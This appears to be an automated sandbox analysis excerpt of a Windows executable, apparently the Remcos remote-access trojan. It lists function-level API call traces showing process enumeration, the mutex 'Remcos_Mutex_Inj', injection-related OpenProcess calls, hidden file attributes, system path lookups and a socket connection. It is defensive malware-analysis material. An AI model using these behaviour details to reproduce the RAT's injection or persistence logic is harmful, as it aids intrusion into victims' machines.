                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040A033
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0), ref: 0040A043
                                                • Sleep.KERNEL32(00000BB8), ref: 0040A06A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A07E
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 00407139
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407143
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 00407163
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 0040717D
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407187
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004071A7
                                                  • Part of subcall function 00407112: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(explorer.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004071C9
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004074CA), ref: 004071D4
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 004071E1
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004071EB
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040720D
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407216
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040721F
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040A0AF
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A0B8
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040A0C1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A0CE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000), ref: 0040A0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@$G@2@@0@V?$basic_string@$Hstd@@$?size@?$basic_string@$??1?$basic_string@$FileV10@$exit$??0?$basic_string@??8std@@CloseCreateNameOpenPathProcessSleepTempV10@@$??4?$basic_string@CurrentD@1@@ExecuteExistsG@1@@HandleModuleMutexObjectQueryShellSingleV01@V10@0@ValueWaitlstrcat
                                                • String ID: .exe$EXEpath$WDH$open$temp_$|EA$)A
                                                • API String ID: 962817110-4292904181
                                                • Opcode ID: ae363eb5805153746dc6e3701de724b2a9df5dd02c84358422de401d41d0a7d0
                                                • Instruction ID: 474e15d3884933020acca0955f214181e6bead7d41bed0abb2de22d9c15f6354
                                                • Opcode Fuzzy Hash: ae363eb5805153746dc6e3701de724b2a9df5dd02c84358422de401d41d0a7d0
                                                • Instruction Fuzzy Hash: 3291B9B16002057BDB01AFA09C59FEF7B6CAB49706F0080BAF606E61D1DE785E85C76D
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00419958,00419BC8,00000000), ref: 004090F5
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004146C0), ref: 0040910A
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00409123
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040912D
                                                • Process32FirstW.KERNEL32(?,?), ref: 00409149
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409158
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409178
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409187
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409191
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 0040919B
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 004091AF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091BF
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 004091CF
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004091EB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F4
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409205
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409210
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409219
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409222
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004137F0), ref: 00409234
                                                • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 0040925B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409264
                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 0040926D
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004137F0), ref: 00409274
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409283
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409297
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004092A0
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 004092BA
                                                • wcslen.MSVCRT ref: 004092D1
                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 004092DD
                                                • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 004092EE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004092FF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040930D
                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 0040931C
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00409326
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409330
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 0040934E
                                                • CloseHandle.KERNEL32(00000000), ref: 00409367
                                                  • Part of subcall function 0041167A: OpenProcess.KERNEL32(00000400,00000000,?,?,0040924B,?), ref: 00411690
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040936E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$G@2@@0@$HandleProcess32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateG@1@@ModuleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@2@@std@@D@std@@FileFirstG@2@@0@0@G@2@@0@@MutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj$)A
                                                • API String ID: 481812264-3931318087
                                                • Opcode ID: a11a9b4b5b8a7b05e95983f97ae178db721cdbe3a86937e6c4bbdf585e605e32
                                                • Instruction ID: a69f2a0f31e321f0c4876fdb0c98637c04e37c77b808a582485a8c32d10448ed
                                                • Opcode Fuzzy Hash: a11a9b4b5b8a7b05e95983f97ae178db721cdbe3a86937e6c4bbdf585e605e32
                                                • Instruction Fuzzy Hash: 3271F17250010ABFCF14EFA0DC59AEE7B78EF15356F1040BAF606A20A1DB755B89CB58
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040817F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004081B6
                                                • _wgetenv.MSVCRT ref: 004081C6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004081D1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004081DC
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004081E8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081F1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081FA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408203
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 00408217
                                                • _wgetenv.MSVCRT ref: 00408227
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408232
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040823D
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408249
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408252
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040825B
                                                • _wgetenv.MSVCRT ref: 00408279
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 00408284
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,00419BC8), ref: 0040829A
                                                • GetLongPathNameW.KERNEL32(00000000), ref: 004082A1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 004082B3
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00413888,?,00000000), ref: 004082C6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004082DC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082E7
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004082FE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408307
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408310
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408319
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 1999370131-1609423294
                                                • Opcode ID: e10ec81fa66f6437e980c991d2c88ce9e9cb5844b5c1d2a04ba3897fc4feb433
                                                • Instruction ID: 422c2ae3d1d39e43b5eecec687f648c42e8622a67a36d815f4917ee9b75bed2a
                                                • Opcode Fuzzy Hash: e10ec81fa66f6437e980c991d2c88ce9e9cb5844b5c1d2a04ba3897fc4feb433
                                                • Instruction Fuzzy Hash: E7517F72400109EFCF04EF90ED59DEE7B78AB14306B2041AAF516A20A5EF756B49CB69
                                                APIs
                                                • Sleep.KERNEL32(00002710), ref: 00404975
                                                  • Part of subcall function 004048A0: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00413670,?,00419BC8,00404982), ref: 004048D0
                                                  • Part of subcall function 004048A0: CreateFileW.KERNEL32(00000000), ref: 004048D7
                                                  • Part of subcall function 004048A0: GetFileSize.KERNEL32(00000000,00000000), ref: 004048E6
                                                  • Part of subcall function 004048A0: Sleep.KERNEL32(00002710), ref: 00404915
                                                  • Part of subcall function 004048A0: CloseHandle.KERNEL32(00000000), ref: 0040491C
                                                  • Part of subcall function 004048A0: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404944
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00404987
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040499C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004049AD
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 004049B4
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004049BF
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 004049C6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004049D7
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004049DE
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 004049EF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004049FE
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00404A0B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404A18
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404A33
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404A3E
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404A4A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00404A5E
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00404A65
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404A76
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00404A82
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404A97
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00404ABB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404AC4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404AA1
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ACD
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404ADD
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404AE6
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404AF0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 00404B08
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404B18
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404B29
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404B32
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00404B3F
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00404B50
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 00404B5F
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00404B66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                                • String ID: p6A
                                                • API String ID: 3042614570-595022129
                                                • Opcode ID: 73c2a4984302e522f55480b0dba4285b315acd8f032863f958fcc54dae4d8394
                                                • Instruction ID: 56c4c9a563e503a855f4c1bf16c9e47296571518d8d3a4f87e0d102e10045e54
                                                • Opcode Fuzzy Hash: 73c2a4984302e522f55480b0dba4285b315acd8f032863f958fcc54dae4d8394
                                                • Instruction Fuzzy Hash: 2A510E75A00119AFCF04BFA4EC5DAEE7B79AB44706F0480B9F606A31E1DF349A45CB58
                                                APIs
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,?,00000000,00000002,?,00000000), ref: 0040CB6E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,?,00000000), ref: 0040CB7E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040CB8E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040CB98
                                                  • Part of subcall function 004024A6: socket.WS2_32(00000000,00000001,00000006), ref: 004024B0
                                                  • Part of subcall function 004024A6: connect.WS2_32(00000000,00419298,00000010), ref: 004024BF
                                                  • Part of subcall function 004024A6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00419288,?,00401671,00000061), ref: 004024D2
                                                  • Part of subcall function 004024A6: closesocket.WS2_32(00000000), ref: 004024EA
                                                  • Part of subcall function 004024A6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,00419298,00000010,00000000,00000001,00000006,00419288,?,00401671,00000061), ref: 004024F5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBB2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBBE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBCA
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
